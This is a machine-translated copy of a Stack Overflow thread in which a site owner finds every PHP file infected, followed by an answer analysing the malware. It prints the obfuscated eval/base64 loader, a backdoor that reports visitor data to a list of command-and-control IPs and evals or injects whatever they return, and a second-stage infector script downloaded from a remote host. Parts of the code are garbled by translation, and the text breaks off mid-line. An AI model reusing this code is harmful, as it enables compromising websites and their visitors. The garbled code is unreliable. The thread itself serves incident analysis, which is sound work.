我的网站可能被黑了吗?

时间:2012-04-09 19:02:29

标签: php security hosting

我在这里写这篇文章可能很疯狂,但我现在太害怕了。 我在iPage上托管了2个网站。

我的网站上的所有PHP页面都在今天早上9点左右被修改,所有这些页面都有以下前缀

<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0poVjFsblMwTkdiV1JYTldwa1IyeDJZbXc1YkdWSGJIcGtTRTF2U1d0a2JHUkZNV2hpVjBWcFMxTnNOMGxEUW0xa1Z6VnFaRWRzZG1KcFFuUmlNbEptV1RJNWRVdERVbWxrVjFsd1pUTk9NR05zT1hCamJWWjNZa2RHYWxwVFoybFFSMHAyV2tockswbHBkMmxRUjBwMldraHJLMGxwZDJ0WmJsWnRURU5TYW1KdVVtWmhRMnMzWVZkWlowdERVbXBpYmxKbVlVTkJPVkJUUVhoTFUwSTNTa2RLTVZwcFFUbEpTRTR3WTJ3NWNHTnRWbmRpUjBacVdsTm5hVkJIU25aYVNHc3JTV2wzYVZCSFNuWmFTR3NyU1dsQmRVbElUakJqYld4M1l6SjRhR015YUd4amVXZHJXREZPUmxWc1drWlZiSE5wV2pJNWRscERTbVJMVTNkcldXNVdiVXRVYzJkamJWWXdaRmhLZFVsRFVtbGtWMWszWmxoT01HTnNPWEJqYlZaM1lrZEdhbHBUWjJsUVF6bHBZakpTTlZCcFNYTkphbmQyV1cwNWEyVlVOR2xNUTFKcFpGZFpjMHBIVG5Wa1JqbHZTMVIwY0ZwcFFXOUtSMDUxWkVZNWIwbEVNRGxKUkVWd1NVaHphMWx1Vm0xSlJEQm5Zek5TZVZneWJIbGFXRUp6V1ZkT2JFdERTVGhNTWtwMldraHJLMGxwZUhwa1NFcHdZMGhPYzFsWVRtOWFXRTF2U2tZNVZGSldTbGRTVmtwaVNXMWtkbUl5VVdsWVUydDFTV3AzZGxsdE9XdGxWRFJwVEVOU2FXUlhXWEJQZVVKNVdsaFNNV050TkdkS1Iwb3hXbXAwT1dOdFZqQmtXRXAxU1VOU2FXUlhXVGRtVjFveFltMU9NR0ZYT1hWSlJ6bDNXVmMxY21GVFoydFpibFp0UzFoemExb3pjR1phVTBFNVNVZGFhR0pJVG14UGVWSnZXREozWjFCVFFtOWFWMFpyV2xoS2VsZ3llSEJqTTFGdlMxUjBjRnBwUVc5aFZ6Vm1XVmhLZVZsWWEyOUphMDUyWW01U2JHSnVVWFJTVnpWcVlqSlNjR0p0WXpaSlIyUTJZVmhCYVV4RFFXdGhSamx6UzFOcloyVjVRV3RhTTNCbVdsTkJPVWxJVW5sa1YxVTNabGRzYlVsRFoydGFNM0JtV2xOc04wcElVblJqUjFwMVdWY3hiRWxFTUdka1IxWjBZMGMxYUdKVFoybE1NMUowWTBOSmMwbERTa2RVTURocFMxUjBiV0ZYZUd4WU0wSXhaRVk1YW1JeU5UQmFWelV3WTNsbmEyUkhNWGRhYlRWb1lsZFZjMGxEVW1sa1YxbHdUM2xTTmxwRFFUbEpSMlEyWWpOQ2JHSnBaMnRrUnpGM1dtMDFhR0pYVlhOSlEwcDVTV2xyTjBwSFRuWmlibEpzWW01U2VrbEVNR2RhTTNCNVdsZEdhMHREVWpaYVEzZG5UVlJCZDAxRVFYZE5SRUZ3VDNsU2FtSXlOVEJhVnpVd1kzbEJPVWxITVhaYVJqbHFZakkwYjBwSFRuWmlibEpzWW01U2VrdFVkRzVsYlU1ellqTk9iRXREVWpaYVEyczNaRmMxYzJGWE5YSkxRMUl3WWxoQ2JXSnRSblJhVTJzM1NrZE9kbUp1VW14aWJsSjZTVVF3WjFvemNHeGliVTUyV2tkVmIwcEhUblppYmxKc1ltNVNla3RVZERsSlIxWnpZekpWWjJWNVVtcGlNalV3V2xjMU1HTjVRVGxKUnpGMldrWTVhbUl5Tkc5S1Iwb3hXbWxyTjJaVFVuTmFWelJuVUZOQ2VtUklTbk5hVnpSdlNrZE9kbUp1VW14aWJsSjZTMVIwYjFwWFJtdGFXRWx2U1d0T2RtSnVVbXhpYmxGMFZFZFdkVm96VW05UGFVRnBUR2xTYzFwWE5IQlBNMHBzWkVoV2VXSnBaMnRaTWpsMVpFZFdkV1JJVFhCUE16Qm5XbTVXZFZrelVuQmlNalJuVWpKV01GUlhSblJaVTJkd1pYbFNkR0l6VW05YVdFbG5VRk5CYVdRelpETk1hbXMxV1cxc01HTjVOV3BpTWpCcFR6TktiR1JJVm5saWFVRnJZbGM1TUdGSFZubFBNekYyV1d3NWVtUkhSbmxrUTJkcFlqTkNhR0p0ZEhCSmFXczNXbTVXZFZrelVuQmlNalJuV1Zkb2JXUlhVbTFpUjFvMldrZG9iV0ZJVFc5S1NFSm9TMWh6YTJKWFJuUlpVMEU1U1VWa2JHUkZNV2hpVjBWdlMxUnphMXB0YkhOYVUwRTVTVWhXZVdKSFZuVlpNamxyV2xOb1psZ3dXa3BVUlZabVdIbHJOMkZYV1dkTFIyeDZZekpXTUV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldEQm9VRlV4VVdsWVUydHdaWGxTYjJJelRqQkpSREJuU2tZNVZGSldTbGRTVmtwaVNXdG9WVlpHUW1aVFJUbFVWa05LWkU4ek1HZGFWM2g2V2xOQ04wcEhhSFpqTTFGblVGTkJhVWxxZERsaFYxbG5TMGRzZW1NeVZqQkxRMUptVlRCV1UxWnJWbE5YZVVwVFVsVXhVRlpGVm1aUlZWSkZWV2xLWkV0VGJEZEtSMngzU1VRd1owcEdPVlJTVmtwWFVsWktZa2xzU2taVVZUbFZVbFk1UWxKRlVsTkpiREEzWmxOQ2JHSklUbXhKU0hOcllWaEJaMUJUUVdsSmFuUTVZVmRaWjB0SGJIcGpNbFl3UzBOU1psVXdWbE5XYTFaVFYzbEtTVlpHVWxGWU1VcEdVbXRXVTFKV1NXbFlVMnR3WlhsU2VWcFhXV2RRVTBJeFkyMTRiR0p0VG5aYVIxVnZTa1k1VkZKV1NsZFNWa3BpU1d0b1ZWWkdRbVpWYTFaSFVsWktSbFZwU21STFZIUTVTVWRXYzJNeVZXZGxlVko1V2xkWloxQlRRV2xKYW5RNVlWZFpaMHRIYkhwak1sWXdTME5TWmxVd1ZsTldhMVpUVjNsS1NWWkdVbEZZTVZaVVVsWktabEZWWkVaVWJGRnBXRk5yY0dWNVVqRlpVMEU1U1VoV2VXSkhWblZaTWpscldsTm9lbVJJU2pCaU1uaDJaREpXZVV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldERldWRkpXU21aUlZXUkdWR3hSYVZoVGEzQlBNekJuV2xkNGVscFRRamRLU0Zab1NVUXdaMGxwU1RkbVYyeHRTVU5vY0dNelRteGtRMmRyV0RGT1JsVnNXa1pWYkhOcFZWWldSbFZzYkdaVk1WSlRVMVUxU0Vsc01IQkxXSE5yWTFoTloxQlRRakZqYlhoc1ltMU9kbHBIVlc5S1JqbFVVbFpLVjFKV1NtSkpiRVpXVWxaS1dsZ3hUbFZWYTJ4UFVubEtaRXRVZERsSlIxWnpZekpWWjJWNVVuaGplVUU1U1VOSmFVOHpNR3RrV0VweldIcEJaMUJUUVdsaFNGSXdZMFJ2ZGt4NVNXZE1hVUZyWTBkRk4wcElWbmxpUmpoNFNVUXdaMGxwT1hGYVYxSndURzVDYjJORU9USmFXRXA2WVZjNWRWQlVRVFZQVkVWdFlsYzVNR0ZIVm5sUVUwbG5UR2xTZEZsWE1XaEpRelJuU1dsYWJXRlhlR3hRVTBsblRHbEJhMXB0YkhOYVUwRjFTVU5KYldGSE9YcGtSREJwU1VNMFowcEhhSFpqTTFGblRHbEJhVXB0YkhkUVUwbG5UR2xCYTJGWVFXZE1hVUZwU201S2JGcHFNR2xKUXpSblNraEtiRnBwUVhWSlEwbHRaRmRGT1VscFFYVktTRlpvU1VNMFowbHBXbmhqZWpCcFNVTTBaMHBJUm5wUGVWSXdZMjVyWjFCVFFqQmpibFpzVHpKc2JVdERRbTFrVnpWcVpFZHNkbUpzT1d4bFIyeDZaRWhOYjBsdFRqRmpiWGhtWVZjMWNHUkRTWEJKUTJ3M1NrZE9iMGxFTUdkWk0xWjVZa1k1Y0dKdGJEQkxRMUl4WTIxNFprMURRWFZKUTFJeFkyMTRaazFUYXpkWk0xWjVZa1k1ZWxwWVVuWmpTRkZ2U2tkT2IweERRa1JXVmtwTlZERkNWVmd4U2taV1JsWlRWR3hTVTFGVk5WUlNhMVpUVEVOQmVFdFVkR3BrV0VweldETk9iR1JIT1hka1EyZHJXVEpuYzBsRlRsWlZhM2hRVlVaU1psWkZiRTVTVlRsV1ZrTjNaMDE1YXpkS1NGWnpaRU5CT1VsSVVubGhWekJ2V1ROV2VXSkdPV3hsUjFacVMwTlNhbUZEYTNCUGVWSXdZMjVyWjFCVFFtMVpWM2g2V2xSME9VbEhiRzFKUTJkdllWYzFjRmd5Wkd4a1EyZHBXVmQ0YzJJelpHWmtXRXB6V0RKYWRtTkhWblZKYVd0d1NVTlpiVWxEVWpCamJtdHdTVWh6YTJSWGVEQkpSREJuWkVoS2NHSlRhRUZhYld4eldsWTVibHBZVW1aWk1qbDFaRWRXZFdSSVRXOUtTRlo1WWtZNGQwbEROR2RLU0ZaNVlrWTRlRXRUYXpkS1NGSjVaVk5CT1VsSFdtaGlTRTVzVHpNeGNGcHBaMnRrU0VvMVMxaHphMXB1UVdkUVUwSnRZekk1YW1FeU9YZGFWelJ2U2toQ2FFeERRVFJOUTNkblNrZFdlV050TlhaTVEwRnJXbGhLZVdNelVubE1RMEY2VFVOck4yRlhXV2RMUTFKdFkwTnJaMlY1VW5aa1dGRm5VRk5CYVZJd1ZsVkpRMUl4WTIxNFprMVRRa2xXUmxKUlRIcEZkVTFHZUhsWVJ6UnBUM2xTZG1SWVVXZE1hakJuU1d0b2RtTXpVVFpKUTFKM1dWWjRlVmhITkdsUGVWSjJaRmhSWjB4cU1HZEphMDUyWW0wMWJGa3pVbkJpTWpRMlNVVk9jMkl6VG14WVNFcGpZbXg0ZVZoSE5HbFBNbG96WTIxc01GcFRaMnRhYmtGelNVTlNkbVJZVVhCUGVWSjVXbGhSWjFCVFFXbEphblF6WVVkc2MxcFRRVzlKVjFwc1lqSlpiMHBIV25kTFUydG5aWGxTZVZwWVVXZEpRelE1U1VOQ2JWb3lWakJqZVdkcldtNUJjMGxFUlhsUFEyczNabGRhYW1KSE9YcGFVMmRyV201QmNFOTVVakZpU0ZGblVGTkNNR050YkhSTFNFNHhXVzVPTUdOcFoydGpiVll3VEVOQ2VtUklTbmRpTTAxdlNraEtiR1JEZDJkSmJIaDVXRWMxWTJOc2VIVkphV3RuUzNsQk1FdFRhemRtV0RCblNVZHNiVWxEYUhwa1NFcDNZak5OYjBwSVZuTmtRM2RwV2xoYWFHSkRTWEJKUTBVNVVGTkNiVmxYZUhwYVUydzNTa2h2WjFCVFFucGtTRXB3WTBoT2MxbFlUbTlhV0Uxdll6TlNlVmd6U214alIzaG9XVEpWYjBsdFZqSlpWM2RwVEVOSmFVeERVakZpU0ZGd1MxUnpaMXBZV21oaVEyZHJaV2xyTjBsSFZqUmhXRkZ2UzFSME9XRlhXV2RMU0U0d1kyNUNkbU41WjJ0a1YzZ3dURU5LYkZsdE5XaEphV3RuU1ZRd09VbEhXbWhpU0U1c1MxaHphMWd4VGtaVmJGcEdWV3h6YVZveU9YWmFRMHBrU1VRd1oyTXpVbmxZTTBwc1kwZDRhRmt5Vlc5SmJWWnBZbTFGYVV4RFNXbE1RMUl4WWtoUmNFOHpTbXhrU0ZaNVltbENNR051Vm14UE16RnNZa2hPYkVsSWRIbGFXRkl4WTIwMFoxcHRSbk5qTWxVM1psZ3dhMXB0UmpCaFIxWjVUV3gwWkVsRU1HZEphbU0wVEdwUk1reHFSVE5OZVRSNFRrTkpOMHBIV21oa1IyaHNZMnBLWWxoVFFUbEpRMGw0VG5wWmRVOVROSGxOVkdkMVRWUnJlRWxxYzJ0YWJVWXdZVWRXZVUxc2RHUkpSREJuU1dwcmVFeHFTWGxQUXpSNFRsUlJkVTFxVlRCSmFuTnJXbTFHTUdGSFZubE5iSFJrU1VRd1owbHFZek5NYW1kNFRHcEpNRTFUTkhsT1ZFMXBUM2xTYlZsWVVtOWFXRWw1VnpFd1oxQlRRV2xOVkdjd1RHcG5lVXhxUlhoT2VUUjRUVlJCYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTVETkhsTlJFbDFUMVJOYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTFxVVRWTWFsVTBUR3BGZWs1VFNUZEtSMXBvWkVkb2JHTnFTbUpZVTBFNVNVTkplRTU2V1hWUFV6UjVUa1JGZFUxVVZYZEphbk5yV20xR01HRkhWbmxOYkhSa1NVUXdaMGxxVVRKTWFrMHpUR3BGTWs5VE5ERk9hVWszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RCT2FUUjZUVU0wTUUxVE5EVlBVMGszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RWT1F6UjVUa1JKZFUxcVZURk1hazB4U1dwemExcHRSakJoUjFaNVRXeDBaRWxFTUdkSmFrVXpUME0wZUU1cVNYVk5WRWsxVEdwSmVVMTVTVGRLUjFwb1pFZG9iR05xU21KWVUwRTVTVU5KTTA5RE5EQk9lVFI0VDBSUmRVMTZUV2xQZVZKdFdWaFNiMXBZU1hsWE1UQm5VRk5CYVUxNlJYVk5WR2N3VEdwSmVrNURORFZPYVVrM1l6Sm9NVnB0V25OYVUyZHJXbTFHTUdGSFZubE5hV3MzV20wNWVWcFhSbXBoUTJkcldtMUdNR0ZIVm5sTmFVSm9ZM2xCYTJSWVNYQmxNbXh0U1VObloxbFhhRzFrVjFKdFlrZGFObHBIYUcxaFNFMXZTa2hXZVV0VFFYQkpTSE5uV1c1S2JGbFhjMmRQTXpFNVpsRTlQU0lwS1RzZyIpKTsg")); ";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>

我尝试了iPage支持,他们不知道发生了什么。他们刚刚为我创建了一张支持票,将在48小时内查看!!

更新

收到有关黑客攻击的电子邮件

  

来自:可怜的受害者hahahaha@gmail.com

     

消息:为什么我的服务器上有这段代码?你为什么要乱砍我的   文件???这段代码指向你!!!准备诉讼

     

if(!function_exists(“GetMama”)){function mod_con($ buf){   str_ireplace(“”,“”,$ buf,$ cnt_h); if($ cnt_h == 1){$ buf =   str_ireplace(“”,“”。stripslashes($ _ SERVER [“good”]),$ buf);返回   $ BUF; } str_ireplace(“”,“”,$ buf,$ cnt_h); if($ cnt_h == 1){$ buf =   str_ireplace( “” 的stripslashes($ _ SERVER [ “好”])。 “”,$ BUF);返回$ buf;   } return $ buf;函数opanki($ buf){$ gz_e = false; $ h_l =   headers_list(); if(in_array(“Content-Encoding:gzip”,$ h_l)){$ gz_e   =真; } if($ gz_e){$ tmpfname = tempnam(“/ tmp”,“FOO”); file_put_contents($ tmpfname,$ buf); $ zd = gzopen($ tmpfname,   “r”); $ contents = gzread($ zd,10000000); $ contents =   mod_con($ contents); gzclose($ zd); unlink($ tmpfname); $ contents =   gzencode($内容); } else {$ contents = mod_con($ buf); } $ len =   strlen($ contents); header(“Content-Length:”。$ len); return($ contents);   函数GetMama(){$ mother =“www.99bits.com”;返回$ mother;   } ob_start(“opanki”); function ahfudflfzdhfhs($ pa){$ mama =   GetMama(); $ file = urlencode( FILE ); if   (isset($ _ SERVER [“HTTP_HOST”])){$ host = $ _SERVER [“HTTP_HOST”]; }   else {$ host =“”; } if(isset($ _ SERVER [“REMOTE_ADDR”])){$ ip =   $ _SERVER [ “REMOTE_ADDR”]; } else {$ ip =“”; }如果   (isset($ _ SERVER [“HTTP_REFERER”])){$ ref =   进行urlencode($ _ SERVER [ “HTTP_REFERER”]); } else {$ ref =“”; }如果   (isset($ _ SERVER [“HTTP_USER_AGENT”])){$ ua =   进行urlencode(用strtolower($ _ SERVER [ “HTTP_USER_AGENT”])); } else {$ ua =“”;   } if(isset($ _ SERVER [“QUERY_STRING”])){$ qs =   进行urlencode($ _ SERVER [ “QUERY_STRING”]); } else {$ qs =“”; } $ url_0 =   “http://”。 $ pa; $ url_1 =“/ jedi.php?version = 0991&amp; mother =”。$ mama。   “&amp; file =”。 $ file。 “&amp; host =”。 $ host。 “&amp; ip =”。 $ ip。 “&amp; ref =”。 $ ref。   “&amp; ua =”。$ ua。 “&amp; qs =”。 $ qs; $ try = true; if(   function_exists(“curl_init”)){$ ch = curl_init($ url_0。   $ url_1); curl_setopt($ ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ ch,   CURLOPT_TIMEOUT,3); $ ult = trim(curl_exec($ ch)); $ try = false;如果   ((ini_get(“allow_url_fopen”))&amp;&amp; $ try){$ ult =   trim(@file_get_contents($ url_0。$ url_1)); $ try = false; }如果($ TRY){   $ fp = fsockopen($ pa,80,$ errno,$ errstr,30); if($ fp){$ out =“GET   $ url_1 HTTP / 1.0 \ r \ n“; $ out。=”主机:$ pa \ r \ n“; $ out。=”连接:   关闭\ r \ n \ r \ n“; fwrite($ fp,$ out); $ ret =”“; while(!feof($ fp)){$ ret   。= fgets($ fp,128); } fclose($ fp); $ ult = trim(substr($ ret,   strpos($ ret,“\ r \ n \ r \ n”)+ 4)); if(strpos($ ult,“eval”)!==   false){$ z = stripslashes(str_replace(“eval”,“”,$ ult));的eval($ Z);   出口(); } if(strpos($ ult,“ebna”)!== false){$ _SERVER [“good”] =   str_replace(“ebna”,“”,$ ult);返回true; } else {return false; }   } $ father2 [] =“78.46.173.14”; $ father2 [] =“176.9.218.191”; $ father2 []   =“91.228.154.254”; $ father2 [] =“77.81.241.253”; $ father2 [] =“184.82.117.110”; $ father2 [] =“46.4.202.93”; $ father2 [] =   “46.249.58.135”; $ father2 [] =“176.9.241.150”; $ father2 [] =   “46.37.169.56”; $ father2 [] =“46.30.41.99”; $ father2 [] =   “94.242.255.35”; $ father2 [] =“178.162.129.223”; $ father2 [] =   “78.47.184.33”; $ father2 [] =   “31.184.234.96”; shuffle($ father2); foreach($ father2 as $ ur){if(   ahfudflfzdhfhs($ ur)){break; }}

     

从(IP地址)发送:64.118.163.18(64.118.163.18)日期/时间:4月   9,2012 7:15 pm来自(referer):   http://www.99bits.com/contact-us/使用(用户代理):Mozilla / 5.0   (Macintosh; Intel Mac OS X 10_7_3)AppleWebKit / 535.19(KHTML,如   Gecko)Chrome / 18.0.1025.151 Safari / 535.19

感谢你们每个人的所有帮助和知识。由于一些奇怪和未知的原因,我的博客是这次黑客攻击的目标。我暂时关闭了博客,直到我可以清理所有文件(因为我的所有PHP文件都被感染了)。

4 个答案:

答案 0 :(得分:7)

在当前表单中,脚本具有以下命令和控制服务器(“c&amp; c”):

$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";

该脚本在每次运行时随机化它们的顺序。然后它尝试发送包含这些变量的GET请求

$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__

到第一个c&amp; c服务器,如果响应不包含evalebna(或服务器已关闭),它将尝试下一个c&amp; c服务器,依此类推。

如果c&amp; c服务器返回:ebna <somestring><somestring>将被放置在您网站的正文标记内。所以黑客可以插入任意的html / js代码。

在c&amp; c服务器返回eval <somestring>的另一种情况下,<somestring>将传递给eval()。这样黑客甚至可以执行任意的PHP代码。

我设法让c&amp; c服务器通过省略所有url参数来返回eval响应,如下所示:http://<server-ip>/jedi.php,这是响应:

eval $try = true;
if (function_exists("curl_init")) {
    $ch = curl_init('http://2brewers.com/99.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    $try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
    $ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
    $try = false;
}
if ($try) {
    $fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
    if ($fp) {
        $out = "GET /99.txt HTTP/1.0\r\n";
        $out. = "Host: 2brewers.com\r\n";
        $out. = "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $ret = '';
        while (!feof($fp)) {
            $ret. = fgets($fp, 128);
        }
        fclose($fp);
        $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
    }
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);

加载并执行http://2brewers.com/99.txt,如下所示:

function get_file_extension($file_name) {
    return substr(strrchr($file_name, '.'), 1);
}

function pass_gen($dol) {
    $source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $source[1] = "0123456789";
    $length = rand(5, 50);
    $passwordlen = intval($length) - 1;
    $use = implode("", $source);
    $max_num = strlen($use) - 1;
    $rp = '';
    for ($i = 0; $i < $passwordlen; $i++) {
        $x = rand(0, $max_num);
        $rp. = $use[$x];
    }
    if ($dol) {
        return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
    } else {
        return $source[0][rand(0, strlen($source[0]) - 1)].$rp;

    }
}

function GetMass($text, $code, $massname) {
    $a = str_split($text);
    foreach($a as $b) {
        $evmas[] = ord($b) + $code;
    }
    $z = $massname."= array('".implode("','", $evmas)."');";
    return $z;
}


function Codee($code) {


    $coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';

    $f1 = pass_gen(false);
    $coo = str_replace('F1', $f1, $coo);
    $v1 = pass_gen(true);
    $coo = str_replace('$v1', $v1, $coo);
    $v2 = pass_gen(true);
    $coo = str_replace('$v2', $v2, $coo);
    $v3 = pass_gen(true);
    $coo = str_replace('$v3', $v3, $coo);
    $v4 = pass_gen(true);
    $coo = str_replace('$v4', $v4, $coo);
    $v5 = pass_gen(true);
    $coo = str_replace('$v5', $v5, $coo);
    $v6 = pass_gen(true);
    $coo = str_replace('$v6', $v6, $coo);
    $v7 = pass_gen(true);
    $coo = str_replace('$v7', $v7, $coo);
    $v8 = pass_gen(true);
    $coo = str_replace('$v8', $v8, $coo);
    $v9 = pass_gen(true);
    $coo = str_replace('$v9', $v9, $coo);
    $v0 = pass_gen(true);
    $coo = str_replace('$v0', $v0, $coo);
    $mas1 = pass_gen(true);
    $coo = str_replace('$mas1', $mas1, $coo);
    $mas2 = pass_gen(true);
    $coo = str_replace('$mas2', $mas2, $coo);
    $mas3 = pass_gen(true);
    $coo = str_replace('$mas3', $mas3, $coo);
    $code1 = rand(1000, 10000);
    $coo = str_replace('$code1', $code1, $coo);
    $code2 = rand(1000, 10000);
    $coo = str_replace('$code2', $code2, $coo);
    $code3 = rand(1000, 10000);
    $coo = str_replace('$code3', $code3, $coo);

    for ($i = 0; $i < 3; $i++) {
        $code = base64_encode($code);
        $code = 'eval(base64_decode("'.$code.'")); ';
    }
    $code = base64_encode($code);


    $z = GetMass('eval', $code1, $mas1);
    $z. = GetMass('create_function', $code2, $mas2);
    $z. = GetMass('base64_decode', $code3, $mas3);
    $z. = $v0.'="'.$code.'";';
    $z. = $coo;
    return $z;

}

function modify($fname) {


    $tmp = file_get_contents($fname);
    $md_start = md5($tmp);

    chmod($fname, 0666);
    $md = md5($fname);



    $pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/<\?php[\s]*\?>/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pos = strpos($tmp, 'GetMama');
    $pos2 = strpos($tmp, 'god_mode_on');
    if (($pos === false) && ($pos2 === false)) {

        $code_t = 'if (!function_exists("GetMama")){  function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}}  if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = 